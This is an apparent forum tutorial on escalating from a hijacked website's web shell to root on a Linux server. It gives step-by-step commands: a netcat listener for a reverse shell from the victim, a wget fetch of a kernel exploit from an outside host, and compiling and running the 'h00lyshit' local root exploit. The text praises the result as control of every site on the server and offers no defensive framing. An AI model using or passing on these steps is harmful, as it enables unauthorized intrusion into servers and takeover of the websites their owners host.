I will show you how to exploit a Linux server and gain root access. This will benefit you in many ways, for example having control of all websites hosted on the server. Enough talking, let's begin!
Requirements for this tutorial:
- A shelled website. - NetCat installed on your computer. - Patience - Port 443 or any other except 80 opened on your router.
Okay, first let's navigate to our shell. If the shell is GNY, you will see something like 'Back Connect'. Go there. Now you see 3 textboxes. Bind to bin/shor backconnect. Type in your IP and the port you want the server to connect (it must be opened on your router.). Now do not press backconnect yet. Download NetCat here:
www.downloadnetcat.com
Extract the files to your desktop in a folder. Now go to Run>cmd. Open cmd. Now type:
cd
Replace with the path of netcat. Okay, now type:
nc -lnvp
Replace with the port you opened and used on the shell.
Now it should display something like this:
Listening on port [any] ...
Minimze this window, and go on the web shell. Type in your IP address and port, click backconnect. If you did all right, and the server does not have a firewall and if your ports are forwarded correctly, you should see an incoming connection from the server. You have a shell! Now you can type 'id' to see your current ID. Let's say your ID is 23. You have control over your website only. But not for long. Now type 'uname -a'. You will get the full kernel version. Simply copy it and google for local root exploits. Let's say it is 2.6.18 2008 version... Hmm that is pretty outdated! Well, let's exploit it. Cd to the tmp directory, that is always writeable.
Type this:
cd /tmp
Now let's make a folder for the exploit.
mkdir exploit
cd into this folder.
cd exploit
Now comes the tricky part. We will use h00lyshit exploit for this kernel. Type:
wget http://goodbye.fileave.com/localroot.c
Now type 'ls'. You should see localroot.c in this folder. We need to compile it. Type:
gcc localroot.c -o h00lyshit
Now type 'ls' and you should see 2 files, localroot.c and h00lyshit. h00lyshit requires a large file on the server in order to get root access, so let's create one. Type this and hit enter:
dd if=/dev/urandom of=largefile count=2M
This will create a large file, where largefile is the name of it. This can take up to 5 minutes. Once ready, chmod hoolyshit and largefile to 777, so:
chmod 777 h00lyshit chmod 777 largefile
Now let's run the exploit! Type this:
./h00lyshit largefile
Now wait, wait for about 3 minutes. If the kernel is not patched and if it is the right version, you are root! Type 'id' and you will see:
uid=0(root)
You have successfully gained root!
|